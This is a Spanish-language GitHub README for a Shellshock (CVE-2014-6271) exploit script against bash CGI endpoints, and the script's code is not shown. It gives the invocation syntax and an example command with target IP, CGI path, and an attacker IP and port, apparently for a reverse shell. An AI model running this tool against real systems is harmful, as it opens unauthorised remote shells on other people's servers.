Skip to content

Latest commit

 

History

History
13 lines (8 loc) · 464 Bytes

README.md

File metadata and controls

13 lines (8 loc) · 464 Bytes

Shellshock-Exploit

Este exploit abusa de la vulnerabilidad Shellshock (CVE-2014-6271) existente en bash a partir de su versión 1.14 hasta la 4.3.

Uso:

python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>

Ejemplo:

python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443

Más información sobre la vulnerabilidad:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271